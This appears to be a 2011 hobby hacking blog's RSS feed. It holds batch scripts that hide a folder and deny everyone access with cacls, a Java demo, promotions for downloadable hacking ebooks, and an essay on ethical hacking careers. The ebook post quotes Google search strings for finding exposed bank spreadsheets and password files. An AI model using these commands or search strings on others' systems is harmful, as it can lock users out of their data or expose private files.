&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:WordDocument&gt;   &lt;w:View&gt;Normal&lt;/w:View&gt;   &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:PunctuationKerning/&gt;   &lt;w:ValidateAgainstSchemas/&gt;   &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:Compatibility&gt;    &lt;w:BreakWrappedTables/&gt;    &lt;w:SnapToGridInCell/&gt;    &lt;w:WrapTextWithPunct/&gt;    &lt;w:UseAsianBreakRules/&gt;    &lt;w:DontGrowAutofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:LatentStyles DefLockedState="false" LatentStyleCount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:"Table Normal";
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-parent:"";
 mso-padding-alt:0in 5.4pt 0in 5.4pt;
 mso-para-margin:0in;
 mso-para-margin-bottom:.0001pt;
 mso-pagination:widow-orphan;
 font-size:10.0pt;
 font-family:"Times New Roman";
 mso-ansi-language:#0400;
 mso-fareast-language:#0400;
 mso-bidi-language:#0400;}
&lt;/style&gt; &lt;![endif]--&gt;  &lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: x-large;"&gt;&lt;span style="color: black;"&gt;Now&lt;/span&gt;&lt;/span&gt;&lt;span style="color: black;"&gt;&lt;span style="font-size: x-large;"&gt;, &lt;/span&gt;little bit risky method.&lt;/span&gt;&lt;span style="color: #990000;"&gt;..&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #351c75;"&gt;here "XYZ" = "Dir of folder or&amp;nbsp; NTFS drive"&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #351c75; font-size: 18.0pt;"&gt;To lock folder:►&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #990000;"&gt;CODE:&lt;/span&gt;&lt;/b&gt;&lt;span style="color: #990000;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp;Title "Hackrich" &lt;/span&gt;&lt;/b&gt;&lt;span style="color: #38761d;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp;attrib +R +S +H -A "XYZ"&lt;/span&gt;&lt;/b&gt;&lt;span style="color: #38761d;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp;ECHO Press Y&amp;nbsp; &lt;/span&gt;&lt;/b&gt;&lt;span style="color: #38761d;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp;cacls "XYZ" /P EVERYONE:N&lt;/span&gt;&lt;/b&gt;&lt;span style="color: #38761d;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp;pause&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;span style="color: #38761d;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #351c75;"&gt;copy code and save it as lock.bat using notepad.. &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #351c75; font-size: 18.0pt;"&gt;To unlock folder:►&lt;/span&gt;&lt;/b&gt;&lt;span style="color: #351c75;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #990000;"&gt;CODE:&lt;/span&gt;&lt;/b&gt;&lt;span style="color: #990000;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp;title "Hackrich" &lt;/span&gt;&lt;/b&gt;&lt;span style="color: #38761d;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp;echo Press Y &lt;/span&gt;&lt;/b&gt;&lt;span style="color: #38761d;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp;cacls "XYZ" /G EVERYONE:F&lt;/span&gt;&lt;/b&gt;&lt;span style="color: #38761d;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp;attrib -R -S -H +A "XYZ"&lt;/span&gt;&lt;/b&gt;&lt;span style="color: #38761d;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp;pause&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #351c75;"&gt;copy code and save it as unlock.bat using notepad..&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #351c75;"&gt;Have fun ! share it plz &lt;/span&gt;&lt;span style="color: #990000;"&gt;:)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b style="color: #674ea7;"&gt;&lt;span style="color: #cc0000;"&gt;&amp;nbsp;&lt;/span&gt; &lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF5MRXHXj7sHs8cpYcUMRwpbHpLDMuK8afPzLwlYM855XuE34LPEbxRmyJCCjIE7qvj9Wv6K9NQTPDjkVLUrjnwvsUSpQDvQCaf1Y94T7Awhb3hcHRfOfytX6-E429bBfegqWdaoF0Fh33/s72-c/LOCKER.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Ebook - Java: The Complete Reference with Jcodes</title><link>http://hackrich.blogspot.com/2011/12/ebook-java-complete-reference-with.html</link><category>Codes</category><category>coding</category><category>education</category><category>java</category><category>Java: A Beginner's Guide</category><category>study</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sat, 3 Dec 2011 13:40:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-6075591983284399534</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsRhgtmVGrFwUFo9YaQ_-IKEL-js9zpCRmmXTTH5AzBpebUbbmpHVqSpYCGLMhWGkqCKyCnoNqGCwnWUyTYSBm-JIKbZG8Zn_VKdYnV82qX5Xlyu1HEUSVbcx1dROAa2qupxNU3b3SVy42/s1600/java.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsRhgtmVGrFwUFo9YaQ_-IKEL-js9zpCRmmXTTH5AzBpebUbbmpHVqSpYCGLMhWGkqCKyCnoNqGCwnWUyTYSBm-JIKbZG8Zn_VKdYnV82qX5Xlyu1HEUSVbcx1dROAa2qupxNU3b3SVy42/s400/java.bmp" width="325" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #351c75;"&gt;Want to learn java ??&lt;/span&gt;&lt;/b&gt;&lt;b&gt; &lt;span style="color: #cc0000;"&gt;:)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style="color: #351c75;"&gt;I have uploaded ebook which can enrich ur knowledge with complete reference..&lt;/div&gt;&lt;span style="color: #351c75;"&gt; .rar file also contains 10 java prog wch wud be helpful to you &lt;/span&gt;&lt;b&gt;&lt;span style="color: #cc0000;"&gt;:)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;so what you waiting for ??&lt;/span&gt; &lt;b style="color: #cc0000;"&gt;:p&lt;/b&gt; &lt;span style="color: #351c75;"&gt;download it and yes don't forget to hit like and share it &lt;/span&gt;&lt;b style="color: #cc0000;"&gt;:)&lt;/b&gt;&lt;br /&gt;
&lt;div style="color: #6aa84f;"&gt;&lt;span style="font-size: large;"&gt;Good luck....&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #351c75;"&gt;Demo:&lt;/span&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;span style="color: #990000;"&gt;********************&lt;/span&gt;&lt;span style="color: #990000;"&gt;Prog&lt;/span&gt;&lt;span style="color: #990000;"&gt;***********&lt;/span&gt;&lt;span style="color: #990000;"&gt;***&lt;/span&gt;&lt;span style="color: #990000;"&gt;***&lt;/span&gt;&lt;span style="color: #990000;"&gt;**************&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;class str{&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; int len;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; String str1="My name is Hackrich";&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; public str(){&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; len=str1.length();&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; }&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; String substr(){&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; int start=len-10;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; int end=len;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; char chars[]=new char[end-start];&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; str1.getChars(start,end,chars,0);&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; String str2=new String(chars);&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; return(str2);&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; }&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;class demo2{&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; public static void main(String args[]){&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; str s=new str();&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; System.out.println("String is:"+s.str1);&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; System.out.println("Substring formed by last 10 char:"+s.substr());&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; }&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #990000;"&gt;***********************&lt;/span&gt;&lt;span style="color: #990000;"&gt;Output&lt;/span&gt;&lt;span style="color: #990000;"&gt;**************************&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;String is:My name is Hackrich&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;Substring formed by last 10 char: s hackrich&amp;nbsp;&lt;/span&gt;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #990000;"&gt;******************************************************&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #990000;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #990000;"&gt;&lt;a href="http://www.4shared.com/file/uA66qAzv/java.html" style="color: #134f5c;" target="_blank"&gt;&lt;b&gt;&lt;span style="color: #cc0000; font-size: large;"&gt;► Download it ◄&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #990000;"&gt;&lt;b&gt;&lt;span style="color: #cc0000; font-size: large;"&gt;&lt;span style="color: #351c75; font-size: small;"&gt;► Password :&lt;span style="color: #38761d;"&gt; HACKRICH.BLOGSPOT.COM&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #990000;"&gt;&lt;b style="color: #93c47d;"&gt;&lt;span style="color: #cc0000; font-size: large;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #351c75; font-size: large;"&gt;Share it :)&amp;nbsp; ♥&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsRhgtmVGrFwUFo9YaQ_-IKEL-js9zpCRmmXTTH5AzBpebUbbmpHVqSpYCGLMhWGkqCKyCnoNqGCwnWUyTYSBm-JIKbZG8Zn_VKdYnV82qX5Xlyu1HEUSVbcx1dROAa2qupxNU3b3SVy42/s72-c/java.bmp" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>(Ebook - English) Access To Other People's Systems Made Simple</title><link>http://hackrich.blogspot.com/2011/11/ebook-english-access-to-other-peoples.html</link><category>Ebook</category><category>education</category><category>Ethical hacker/hacking</category><category>Exploits and Incident Handling</category><category>Google Dork</category><category>Google Hacks</category><category>Hacking Tutorials</category><category>HACKING WINDOWS</category><category>study</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 29 Nov 2011 03:27:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-1448580884297000517</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCcYvL0eI1i_paywhUfEoh1mmU1qmVM1YBCTNv7q6jVd6WWcYNPPvMD5qd96p6vfS4qjtaJFC6ikDyEDSHH53VVrq1BzFkOIv1F5XBKy2ztJ2RPathUXekOtu6arvTCKsLOO5g1xzuiygd/s1600/hackingfordummies.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCcYvL0eI1i_paywhUfEoh1mmU1qmVM1YBCTNv7q6jVd6WWcYNPPvMD5qd96p6vfS4qjtaJFC6ikDyEDSHH53VVrq1BzFkOIv1F5XBKy2ztJ2RPathUXekOtu6arvTCKsLOO5g1xzuiygd/s400/hackingfordummies.jpg" width="318" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #674ea7; font-size: large;"&gt;&lt;b&gt;Book 1:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;The majority of successful attacks on computer systems via the Internet can be traced to exploitation of security flaws in software and operating systems. These few software vulnerabilities account for the majority of successful attacks, simply because attackers are opportunistic – taking the easiest and most convenient route. They exploit the best-known flaws with the most effective and widely available attack tools. Most software, including operating systems and applications, comes with installation scripts or installation programs. The goal of these installation programs is to get the systems installed as quickly as possible, with the most useful functions enabled, with the least amount of work being performed by the administrator. To accomplish this goal, the scripts typically install more components than most users need. The vendor philosophy is that it is better to enable functions that are not needed, than to make the user install additional functions when they are needed. This approach, although convenient for the user, creates many of the most dangerous security vulnerabilities because users do not actively maintain and patch software components they don’t use. Furthermore, many users fail to realize what is actually installed, leaving dangerous samples on a system simply because users do not know they are there. Those unpatched services provide paths for attackers to take over computers.. TO read more download eBooks....&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigVerYfW7UNUBGm6IHovE4Sejwbqn_Hjn9_G9Rhz4zlozZu31VfI-rQv8Aoqe_pmAMpK2UHblOzde65tv_m-xSQLr4QRECrvW5xumDoTkVYunjykUX-qZ7UdfrCGJbGZWa0vF3HN4uaVZP/s1600/google-hacking-tools.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="307" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigVerYfW7UNUBGm6IHovE4Sejwbqn_Hjn9_G9Rhz4zlozZu31VfI-rQv8Aoqe_pmAMpK2UHblOzde65tv_m-xSQLr4QRECrvW5xumDoTkVYunjykUX-qZ7UdfrCGJbGZWa0vF3HN4uaVZP/s400/google-hacking-tools.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: #674ea7;"&gt;&lt;span style="font-size: large;"&gt;Book 2:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;Google: A Hacker's Best Friend&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;In the last few years a number of news articles appeared that warned of the fact that hackers (or&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;crackers if you will) make use of the google search engine to gain access to files they shouldn't be&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;allowed to see or have access to. This knowledge is nothing new to some people but personally I have&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;always wondered how exactly a thing like this works. VNUnet’s James Middleton wrote an article in&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;2001 talking about hackers using a special search string on google to find sensitive banking data:&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;"One such posting on a security newsgroup claimed that searching using the string 'Index of /&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;+banques +filetype:xls' eventually turned up sensitive Excel spreadsheets from French banks. The&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;same technique could also be used to find password files"[1]&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;Another article that appeared on wired.com told us how Adrian Lamo, a hacker who made the news&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;often the last couple of years, explained that google could be used to gain access to websites of big&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;corporations... download eBooks to read more..&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIgIgNModQXDLhw5grjmNByJ60mgiVx8pE2UJ3I5sTN0PuwujKFVXxPPSlYBugRat0P1G-u3yk8iNIJNAK364FjJqAUXlA0rkZcKrX1hIK1S3QwRNeql1EOBRGoLloS4rUFmszEOSr8jDz/s1600/Hacking-for-Dummies.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIgIgNModQXDLhw5grjmNByJ60mgiVx8pE2UJ3I5sTN0PuwujKFVXxPPSlYBugRat0P1G-u3yk8iNIJNAK364FjJqAUXlA0rkZcKrX1hIK1S3QwRNeql1EOBRGoLloS4rUFmszEOSr8jDz/s400/Hacking-for-Dummies.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;This .rar file contains 2 eBooks to download it link and password is given here have fun ! Don't forget to hit like and share it :) &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: #6aa84f;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;►&lt;a href="http://www.4shared.com/file/urnu2-hF/hacking_books.html" target="_blank"&gt; Download it &lt;/a&gt;◄&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;span style="color: #cc0000;"&gt;► PASSWORD:&amp;nbsp; &lt;span style="color: #38761d;"&gt;HACKRICH.BLOGSPOT.COM &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #6aa84f; font-size: large;"&gt;&lt;b&gt;Share it :)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCcYvL0eI1i_paywhUfEoh1mmU1qmVM1YBCTNv7q6jVd6WWcYNPPvMD5qd96p6vfS4qjtaJFC6ikDyEDSHH53VVrq1BzFkOIv1F5XBKy2ztJ2RPathUXekOtu6arvTCKsLOO5g1xzuiygd/s72-c/hackingfordummies.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>How to become Ethical hacker?</title><link>http://hackrich.blogspot.com/2011/11/how-to-become-ethical-hacker.html</link><category>education</category><category>Ethical hacker/hacking</category><category>Hacking Tutorials</category><category>study</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 22 Nov 2011 13:39:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-415690605752479020</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="color: #38761d;"&gt;&lt;b&gt;Many hack addict people have questions about the scope in ethical hacking world.. I have tried here too answer it hope it would be helpful to you...&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Questions like ▼ &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;&amp;nbsp; &amp;nbsp; &lt;i style="color: #674ea7;"&gt;Is there any scope for Ethical hacking?&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li style="color: #674ea7;"&gt;&lt;b&gt;&lt;i&gt;&amp;nbsp; &amp;nbsp; &lt;span class="st"&gt;What is the &lt;i&gt;scope&lt;/i&gt; for &lt;i&gt;ethical hacking&lt;/i&gt; in India? Where can I get the required training?&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li style="color: #674ea7;"&gt;&lt;b&gt;&lt;i&gt;&lt;span class="st"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; How to become an ethical hacker ?&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li style="color: #674ea7;"&gt;&lt;b&gt;&lt;i&gt;&lt;span class="st"&gt;&amp;nbsp; &amp;nbsp; What qualification is needed ?&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhelPDuM7fYq9RoUxbQ157ycj4hyKNJ3fyDWtxT68jcbjBZsZaZ4u2TxVsjqbTLnkvwvcmCTxYypXEYFjbgOx-Wno7vPqnDxdq1-YnGSAwzOHtgqw1nyD8v1TtDMFJnGiZrQ8aCqZ8qQGK3/s1600/ethical.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhelPDuM7fYq9RoUxbQ157ycj4hyKNJ3fyDWtxT68jcbjBZsZaZ4u2TxVsjqbTLnkvwvcmCTxYypXEYFjbgOx-Wno7vPqnDxdq1-YnGSAwzOHtgqw1nyD8v1TtDMFJnGiZrQ8aCqZ8qQGK3/s400/ethical.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: #351c75;"&gt;&lt;i&gt;&lt;span class="commentBody" data-jsid="text"&gt;How do credit card companies  acquire foolproof safety? Who ensures safe access to bank accounts over  the Net, and security of messages on local computers and servers.  Hackers (as opposed to crackers) are the experts whose services are  hired&lt;span class="text_exposed_show"&gt; by organizations to test the  robustness of their network security systems. What differentiates  ethical hackers from crackers is that the former are actually paid to  find a security breach in an organization’s network. It is "ethical" or  legal because it is done with the client’s permission. With more and  more organizations moving their offline transactions online, e-security  has emerged as a major issue. Almost every Fortune 500 company employs  hackers to protect their critical data from possible cracker attacks.  They also educate government, defense services, banks and law  enforcement bodies on how to better use technology to get their jobs  done securely. In India, as the concept of e-security is still not fully  developed, ethical hacking is not as popular. However, it is fast  catching up and very soon ‘constructive hacking’ will become part of  technology consulting.&lt;br /&gt;
&lt;br /&gt;
To be a good hacker, you need to be an  experienced and intelligent programmer in the first place. You need to  know at least one operating system inside out. You have to be  comfortable with networking, TCP/IP and various other protocols. There  are no shortcuts and the best approach is to get hold of as many  technical manuals. You can learn hacking techniques from three main  sources: The Net, books, and hacking clubs. In India, Ankit Fadia’s  "hackingtruths’ club distributes training material to members. &lt;span style="color: #20124d;"&gt;personally, I do not prefer&amp;nbsp; for &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span class="commentBody" data-jsid="text"&gt;&lt;span class="text_exposed_show"&gt;&lt;span style="color: #20124d;"&gt;hackingtruths&lt;/span&gt;.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span class="commentBody" data-jsid="text"&gt;&lt;span class="text_exposed_show"&gt; Some organizations (e.g. SANS, Foundstone etc) do offer courses in ethical  hacking. However, the best training is on the job, which requires  expertise in different tools and techniques. &lt;br /&gt;
&lt;br /&gt;
As a fresher you  would require rigorous training on various networking technologies,  operating systems, scripting, languages, security tools etc.&lt;br /&gt;
&lt;br /&gt;
Experts in this field command huge salaries. Starting salaries would be  higher than standard networking and software professionals.&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span class="st"&gt; &lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style="color: #351c75;"&gt;&lt;i&gt;&lt;span class="st"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;i&gt;&lt;span class="st"&gt;&lt;span style="color: #351c75;"&gt;Try to enrich your knowledge with the use of blogs like hackrich.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;span class="st"&gt;&lt;span style="color: #351c75;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
